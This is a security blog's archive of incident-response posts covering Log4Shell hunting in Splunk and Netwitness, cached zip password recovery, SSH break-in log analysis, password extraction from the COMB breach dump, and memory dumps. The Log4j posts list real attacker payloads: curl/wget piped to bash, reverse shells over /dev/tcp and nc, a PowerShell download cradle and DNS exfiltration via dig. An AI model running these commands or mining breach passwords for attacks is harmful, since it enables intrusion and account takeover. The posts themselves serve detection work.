Category Archives: technique

Windows Credentials Manager – Looking for cached Zip Passwords

Intro

When you open a password protected zip archive using Windows Explorer (“Extract All…”); in Windows 8.x/10, the password is automatically cached in the Credentials Manager for the life of the logon session.

Let’s say you discover a host been infected with a malware that coming from a zip file that are password-protected. We can possibly try to extract cached/stored credential from Windows Credential Manager and see if it stores password for password-protected file that we’re looking for.

Steps

To view if the host contains password for file that we needed, run this cmd below (require Admin privileges):

cmdkey /list

It will show list of stored credential that are available. If your target file is not listed, probably the credential has gone (the host has been rebooted) or the file been extracted using 3rd party apps (WinRAR, 7Zip).

To recover the password, we’ll need to use this Powershell script – https://github.com/zetlen/clortho/blob/master/CredMan.ps1

Download & save the script into target machine. Then, run the script as below:

.\CredMan.ps1 -GetCred -Target "target_credential"

e.g.:

.\CredMan.ps1 -GetCred -Target 'Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\Administrator\Downloads\GeoIP.zip'

As you can see, we able to retrieve the “GeoIP.zip” password (pass: testtest).

Hunting for Log4j RCE (CVE-2021-44228) using RSA Netwitness

So, if you read my previous article; Hunting for Log4j RCE (CVE-2021-44228) using Splunk & Excel, last time we leveraging Splunk as our platform to hunt event/logs related to this Log4J vulnerability.

This time, we’re using RSA Netwitness; which we going to hunt this Log4Shell attempt thru pcap.

If you never seen how’s the RSA Netwitness interface looks like, here are the screenshot of the tools:

After you have gathered the pcap, we can use tshark to extract relevant field/result that we want.

Tshark command and filters that we’ll using:

"C:\Program Files\Wireshark\tshark.exe" -r your_pcap.pcap -Y "ip contains Base64 && http.request && ip contains jndi" -T fields -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.request.method -e http.request.uri -e http.response.code -e http.user_agent -e http.referer -E header=y -E separator=; > out.txt

Example of the output:

ip.src	tcp.srcport	ip.dst	tcp.dstport	http.request.method	http.request.uri	http.response.code	http.user_agent	http.referer
143.244.156.104	37058	X.X.X.X	8080	GET	/		${jndi:ldap://135.148.132.224:1389/Basic/Command/Base64/d2dldCBodHRwOi8vMTUyLjY3LjYzLjE1MC9weTsgY3VybCAtTyBodHRwOi8vMTUyLjY3LjYzLjE1MC9weTsgY2htb2QgNzc3IHB5OyAuL3B5IHJjZS54ODY=}	

If we decoded the base64 above:

wget http://152[.]67[.]63[.]150/py; curl -O http://152[.]67[.]63[.]150/py; chmod 777 py; ./py rce.x86

Hunting for Log4j RCE (CVE-2021-44228) using Splunk & Excel

As you are aware, there are new Log4j vuln (CVE-2021-44228) vuln been disclosed and exploited in the wild currently.

So, I’m using Splunk query as below; based from Splunk blog [1] to see if there is attempt to use this vuln/exploit towards our assets:

index=* "${jndi:*" Base64 
| eval _time_UTC = _time - (strptime("2000-01-01 +00:00", "%F %:z") - strptime("2000-01-01 " . strftime(_time,"%:z"), "%F %Z")) 
| eval time_in_UTC = strftime(_time_UTC, "%F %T UTC") 
| rex field=_raw "[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)(?<proto>\w+)(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?(?<rce_dest>[a-zA-Z0-9\.\-\_\$\{\:]+)" 
| rex field=_raw "\/Base64\/(?<string>\S+)}" 
| table time_in_UTC proto rce_dest string sourcetype 

As you can see, there are numbers of attempt observed towards our infra for past 7 days:

The raw event looks something like this:

2021-12-10 19:27:20 X.X.X.X GET /owa/auth/logon.aspx url=https%3a%2f%2fX.X.X.X%2fowa%2f&reason=0&CorrelationID=<empty>;&ClientId=AGS0JSW0AJIUEPWEVZ&cafeReqId=13016af6-7c1b-4e2f-b148-1cc2399d2b08; 443 - X.X.X.X ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9YLlguWC5YOjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC9YLlguWC4xODo0NDMpfGJhc2g=} https://X.X.X.X/owa/ 200 0 0 0

Using the Splunk query above, it will show you a table formatted data which contains extracted base64 under field named “string“.

The result after we export it from Splunk (opened in Excel) looks like:

If you decode the base64 from the example of raw event above:

KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9YLlguWC5YOjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC9YLlguWC4xODo0NDMpfGJhc2g=

It appear to be a curl & wget attempt towards our infra:

(curl -s 45.155.205.233:5874/X.X.X.X:443||wget -q -O- 45.155.205.233:5874/X.X.X.X:443)|bash

I’m wondering.. How can I quickly decode all these base64 strings? We not gonna decode it one-by-one aren’t we? There are hundreds or probably thousand of it.

So… We going to leverage Excel & macro (yes. you read it right. MACRO) to automatically decode those base64 strings for us. We going to Excel-Fu out of this data.

The macro code that we’ll be using as below:

Function TextBase64Encode(strText, strCharset)

    Dim arrBytes

    With CreateObject("ADODB.Stream")
        .Type = 2 ' adTypeText
        .Open
        .Charset = strCharset
        .WriteText strText
        .Position = 0
        .Type = 1 ' adTypeBinary
        arrBytes = .Read
        .Close
    End With

    With CreateObject("MSXML2.DOMDocument").createElement("tmp")
        .DataType = "bin.base64"
        .nodeTypedValue = arrBytes
        TextBase64Encode = Replace(Replace(.Text, vbCr, ""), vbLf, "")
    End With

End Function

Function TextBase64Decode(strBase64, strCharset)

    Dim arrBinary

    With CreateObject("MSXML2.DOMDocument").createElement("tmp")
        .DataType = "bin.base64"
        .Text = strBase64
        arrBinary = .nodeTypedValue
    End With

    With CreateObject("ADODB.Stream")
        .Type = 1 ' adTypeBinary
        .Open
        .Write arrBinary
        .Position = 0
        .Type = 2 ' adTypeText
        .Charset = strCharset
        TextBase64Decode = .ReadText
        .Close
    End With

End Function

To use it, first, we need to open the Splunk result that we exported earlier.

After that, press Alt-F8 to open the macro editor. Create new macro – you can give any name you want. For example, I named it “Base64“:

It will then open a new window. Paste macro code given above inside the editor:

After that, close the editor window. Just leave the Excel open.

Then, create 2 new column in the Excel sheet; column named “ASCII” and “Decoded Base64“:

We need to fill up column “ASCII” with string “ASCII” until end/bottom of your data. Let’s say you have 300 row of data in your Excel, then fill 300 of “ASCII” strings besides it.

Just press Ctrl + Arrow-Down to quickly go to end/bottom of data column. After that, type in string “ASCII” in one of the row and copy it (Ctrl-C). Then, press Ctrl + Shift + Arrow-Up to select from bottom to top. Then paste/Ctrl + V to fill all column with string “ASCII“.

Your Excel will look something like this:

Next, we going to start decoding the base64 strings.

Again, press Ctrl + Arrow-Down to go end of column, and type the formula as below:

=TextBase64Decode(<column-string>,<column-ASCII>)

Refer example as below:

Then, again, copy column with the formula, Ctrl + Shift + Arrow-Up to select from bottom to top & paste/Ctrl + V the formula into all selected column; under “Decoded Base64“.

That’s it. We have successfully decoded all the base64 strings via Excel.

List of attempt that I’ve observed so far:

(curl http://177.52.40.22:5000/xpert/app/lib/locawebstyle/dist/javascripts/log.php || wget -q -O- http://177.52.40.22:5000/xpert/app/lib/locawebstyle/dist/javascripts/log.php)|bash
(curl -S https://www.econ-jobs.com/Scripts/op.php||wget https://www.econ-jobs.com/Scripts/op.php)|bash
/bin/bash -i >& /dev/tcp/141.105.65.94/81
bash -i  >& /dev/tcp/139.59.138.109/8080 0>&1
bash -i >& /dev/tcp/141.105.65.94/443 0>&1
cmd.exe /c powershell.exe -c Invoke-WebRequest http://177.52.40.22:5000/xpert/app/lib/locawebstyle/dist/javascripts/log.php
dig $(whoami).c6sp7vq2vtc0000xa9y0gdc5d7hyyyyyb.interactsh.com
dig $(whoami).wjj96oqhn65ebgyqdrh6lt7o6fc80x.burpcollaborator.net
nc 165.22.213.147 8888 -e /bin/bash ; curl http://165.22.213.147:7777/backdoor.sh -o backdoor.sh ; chmod +x ./backdoor.sh ;bash backdoor.sh ; dig 
powershell -c iex ((New-Object System.Net.WebClient).DownloadString('https://textbin.net/raw/0l8h4xuvxe'))
telnet 141.105.65.94 443
touch /tmp/pwned
wget http://155.94.154.170/aaa;curl -O http://155.94.154.170/aaa;chmod 777 aaa;./aaa
wget http://194.36.188.187:9090/log/14953

References:
[1] https://www.splunk.com/en_us/blog/security/log-jammin-log4j-2-rce.html
[2] https://stackoverflow.com/questions/41572920/encoding-special-chracters-to-base64-in-excel-vba

Break-In Analyzer – Quickly analyze auth.log, secure, utmp & wtmp logs for possible SSH break-in attempts

Recently, I encountered incident where several hosts been infected by < █████████ >. So, to investigate this incident, we received bunch of logs to be analyze; mostly Linux related logs.

I’ve been thinking.. What if the host has been successfully brute-forced? How can we identify it?

In Linux, there are several logs that we can refer that contains authentication logs for both successful or failed logins, and authentication processes. Location & names of the logs varies; depending on system type. For Debian/Ubuntu, the logs located at /var/log/auth.log. For Redhat/CentOS, the logs located at /var/log/secure.

There are 2 more logs that we can refer;
/var/log/utmp: current login state by user.
/var/log/wtmp: record of each user login/logout.

So, what if we write a script to quickly go thru those mentioned logs & identify the culprits? Probably we can find out if our host has been successfully brute-forced.

Introducing.. Break-In AnalyzerA script that analyze the log files /var/log/auth.log (for Debian based systems), /var/log/secure (for RHEL based systems), utmp/wtmp for possible SSH break-in attempts. – https://github.com/zam89/Break-In-Analyzer

Here are some screenshot of the script in action:

Analyzing auth.log
Analyzing secure logs
Dumping & Analyzing wtmp files

The output result will be written into text file; stored into folder named output. Inside the folder will contains file named:
auth_output.log
secure_output.log
utmp_output.log
wtmp_output.log

So, you must been wondering; how can I validate these IPs? whether they are harmless or not? Well, to do that, we can use AbuseIPDB to quickly see each of IP reputation; either they’re clean or has been reported due to malicious activity.

In this example, I’m using AbuseIPDB Bulk Checker from – https://github.com/AdmiralSYN-ACKbar/bulkcheck. This tool can perform bulk checking of IPs towards AbuseIPDB website. *Just a side notes: it require API key from AbuseIPDb. You can get it for free by registering on the website. Its limited to 1000 request/IPs per day.

So, I’m checking 203 IPs that we got from Break-In Analyzer script output (after removing duplicated using Excels) on AbuseIPDB if there is any records for those IPs. After the check completed, the result shows something like this:

AbuseIPDB Bulk Checker result

If you filter out by abuseConfidenceScore (removing score 0), you’ll see there are 3 IPs that having kinda high confidence score. The higher the score, the more chances the IP marked as malicious – meaning that the IP has been reported multiple times related to malicious activities.

Next, we cross check with our Break-In Analyzer outputs to see where did these IPs located on the logs. Or you can cross check directly with your logs. To do that, run command as below:

$ grep --perl-regexp "110.93.200.118" --color=always --only-matching --recursive * | sort | uniq --count | sort --numeric --reverse

This command is basically searching where the IP “110.93.200.118” located/contains inside the log. If you run the command, you’ll see output as below:

Now we know that the IP “110.93.200.118” is contains inside wtmp dump log:
– node2/output/wtmpdump_output.txt
– node1/output/wtmpdump_output.txt

and also inside tools output:
– node2/output/output_node2.txt
– node1/output/output_node1.txt

If we go search inside the wtmp dump log for that IP “110.93.200.118“, we found that the IP has been accessing the system since Feb 2016… hmm.. 🤦

cat node2/output/wtmpdump_output.txt | grep 110.93.200.118 --color=always

This may indicate that the attacker has been leveraging the host for very long time.

Next step is probably to search what the IP or the account “portaladmin-ts” is doing inside the host.

Extracting password from data leaks dump files

Recently I’ve read about this data leak; COMB: largest breach of all time leaked online with 3.2 billion records.

According to the article, it was known as “Compilation of Many Breaches” (COMB). This data was leaked on a popular hacking forum. It contains billions of user credentials from past leaks from Netflix, LinkedIn, Exploit.in, Bitcoin and more. This leak contains email and password pairs.

Inside the data dump, it was structured something like this:

CompilationOfManyBreaches
  folderdata
    folder1
       file0
       file1
    folder2
       file0
       file1

The file contains something like this:

Which indicated as email:password

So I’m wondered… What if we extract either email or password only from all those files? We can maybe create a password list from that. Or we can analyze the password trend. See what’s the top password being used & stuff.

So… We’re not going thru all hundreds of files which total up 100GB+ to extract the password manually… That’s crazy ma man!

To make it easier, I’ve created a Python script to extract the password from all dump file recursively. The code as below:

#!/usr/bin/env python
import os
from timeit import default_timer as timer
from datetime import timedelta

inputfile = "/Desktop/test/data" #change this to your dump files locations

outputfile = open("extracted_password.txt", "w")

print("\nStart extracting...")
start = timer()

for path, dirs, files in os.walk(inputfile):
    for filename in files:
        fullpath = os.path.join(path, filename)
        with open(fullpath, "r") as f:
            #print(f.read())
            for line in f:
                email, password, *rest = line.split(":")
                outputfile.write("%s" % password)
                #print(password, end='')

outputfile.close()

print("Finish!\n")
end = timer()
print("Time Taken: ", end='')
print(timedelta(seconds=end-start))

Save the code above & run the script:

$ python password_extractor.py

It may takes some times depending on your hardware resources and dump file size. You should see output something like this after the script completed execution:

When completed, you should see a new file named “extracted_password.txt” being created. Inside it contains all the password from all dump file; consolidated into 1 single big ass file.

Now we can start analyzing the password pattern. We can use this command below to see what’s the top 10 password:

$ time sort extracted_password.txt | uniq -c | sort -bgr | head -10

Happy hunting & analyzing! 🙂

Generate Memory Dump from .vmss file using vmss2core

Previously, I’ve encountered a problem where I’m unable to copy the .vmem file for further analysis.

So, the next alternative way that we can do is to use .vmss file & convert it into .vmem file. .vmss is a Virtual machine suspend file.

To start convert it, first you need to download vmss2core tool here – https://flings.vmware.com/vmss2core

Next, open your cmd and enter cmd as below:

F:\Tools> .\vmss2core-sb-8456865.exe -W 'F:\INC\<REDACTED>\<REDACTED>.vmss'
vmss2core version 8456865 Copyright (C) 1998-2017 VMware, Inc. All rights reserved.
region[0]: start=0 end=c0000000.
region[1]: start=100000000 end=240000000.
Cannot translate linear address 0.
... 10 MBs written.
... 20 MBs written.
<snip>
... 8180 MBs written.
... 8190 MBs written.
Finished writing core.

After it finished, it will create a file named memory.vmem.

There you have it. So you can start doing your memory analysis using volatility if you want.

For example, here we’ll be using volatility in order to find out the profile for which .vmem is created.

$ python vol.py -f memory.dmp imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418
                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
                     AS Layer2 : VirtualBoxCoreDumpElf64 (Unnamed AS)
                     AS Layer3 : FileAddressSpace (/home/memory.dmp)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf800028530a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80002854d00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2019-12-23 17:42:50 UTC+0000
     Image local date and time : 2019-12-23 11:42:50 -0600